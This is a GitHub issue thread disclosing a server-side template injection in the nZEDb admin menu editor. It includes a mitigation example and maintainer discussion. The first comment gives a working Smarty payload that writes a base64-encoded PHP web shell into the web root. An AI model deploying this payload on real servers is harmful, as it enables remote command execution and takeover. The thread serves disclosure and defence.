
SSTI Vulnerability in Admin Menu Add #2662

Open
cruatta opened this issue Aug 17, 2022 · 6 comments

Comments

@cruatta

cruatta commented Aug 17, 2022

There is a Server Side Template Injection in /admin/menu-edit.php?action=submit, which I'd like to discuss with the community to try and figure out a solution for.

Background

  • As an admin nZEDb user, I can add a menu item to an installation of nZEDb by navigating from:
    Home Page -> Admin Panel -> Site Settings -> Menu Items -> Add

And then add to the Evaluate field a Smarty expression which triggers code execution on the server:

{system('echo PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz4= | base64 -d > /var/www/nZEDb/www/admin/shell.php && chmod 777 /var/www/nZEDb/www/admin/shell.php')}

The above payload drops an example web shell for further exploitation

Expected behaviour

  • The Evaluate field is meant to determine if a menu is visible or not. Adding a menu as an admin user should likely not allow you to use Smarty template functions like system() which run arbitrary system commands by design. I understand this might be up for some discussion.

Actual behaviour

  • It appears there is no filtering of the functions of the template engine when adding a new menu item. This lets a nZEDb admin user without the ability to run code on the server run arbitrary commands as the user running PHP on the web server.

Steps to reproduce the behaviour

I have created a PoC to demonstrate this along with another vulnerability, which was just patched in #2661

https://gitlab.com/cruatta/nzedb-pwn
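As an added illustration of the mitigation (this is not nZEDb's code, and the class and function names are hypothetical), the Evaluate expression can be compiled under a Smarty security policy that whitelists the PHP functions a template may call, so that `{system(...)}` is refused by the compiler instead of executed. It assumes Smarty 3.1 installed via Composer and a writable compile directory.

```php
<?php
// Added example, not nZEDb's own code. Only the Smarty API is real;
// MenuEvaluatePolicy and menuIsVisible are hypothetical names.
require_once 'vendor/autoload.php'; // assumes Smarty 3.1 via Composer

class MenuEvaluatePolicy extends Smarty_Security
{
    // Only these PHP functions may be called from a template;
    // system(), exec(), etc. are rejected at compile time.
    public $php_functions = ['isset', 'empty', 'count', 'in_array'];
    // Only these PHP functions may be used as modifiers ({$x|system} is refused).
    public $php_modifiers = ['escape', 'count'];
    public $allow_constants     = false;
    public $allow_super_globals = false;
    public $static_classes      = 'none';   // no Class::method() calls
    public $streams             = [];       // no php://, file:// resources
    public $disabled_tags       = ['php', 'include_php'];
}

// Compile and run an Evaluate expression, returning the menu's visibility.
// With $secure = false Smarty imposes no function restrictions (the reported
// behaviour); with $secure = true the policy above is enforced.
function menuIsVisible(string $expression, array $context, bool $secure): bool
{
    $smarty = new Smarty();
    if ($secure) {
        $smarty->enableSecurity(new MenuEvaluatePolicy($smarty));
    }
    foreach ($context as $name => $value) {
        $smarty->assign($name, $value);
    }
    // The expression is loaded from the string resource, never from disk.
    $out = trim($smarty->fetch('string:' . $expression));
    return $out !== '' && $out !== '0' && strcasecmp($out, 'false') !== 0;
}

$context = ['user' => ['role' => 2]]; // constructed sample context

// Legitimate visibility rule: show the menu only to users with role 2.
$rule = '{if $user.role == 2}1{else}0{/if}';
var_dump(menuIsVisible($rule, $context, true));

// A rule of the kind reported above: under the policy the compiler throws
// SmartyCompilerException before any PHP function runs.
$hostile = '{system("id")}';
try {
    menuIsVisible($hostile, $context, true);
} catch (SmartyCompilerException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```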

@Wally73
Contributor

Wally73 commented Aug 17, 2022

As a nzedb admin user I already have full control of the server it's on
so spend your time on other things
you're not even using nZEDb

@cruatta
Author

cruatta commented Aug 17, 2022

I'm confused how I made you upset by trying to fix issues in nZEDb. Spending my free time as I wish is my choice. I'm not asking you to do anything you do not want to do and you can ignore my issues and PRs if that would make you feel better. If you would like to collaborate productively, I have a further question.

As a nzedb admin user I already have full control of the server its on

So to clarify, if I sign up as a regular user on nZEDb via the sign up process, and then I'm promoted to an admin level in the admin panel, this gives me code execution on the server by design? If so, then close this issue as not a bug. After reading over much of the code base and using nZEDb, that was not my impression.

@IITuxtmuxII

Is PHP 7.2 also not EOL?

@DariusIII
Contributor

@cruatta If you make a PR I will have a look at it.
@IITuxtmuxII Yes, PHP 7.2 is EOL and nZEDb is stuck with the li3 framework, which is not even maintained anymore. I have started porting it to CakePHP, but due to lack of free time I have stopped.

@IITuxtmuxII

@DariusIII

I have started porting it to CakePHP, but due to lack of free time i have stopped.

I would be very interested in it, would love to see it.
But yeah, free time is always an issue.

@niel
Contributor

niel commented Dec 24, 2022

li3 is maintained again. One of the original creators, and main coder, is back and working through the backlog.
I started a CakePHP port, but do not remember how much I committed to a branch.
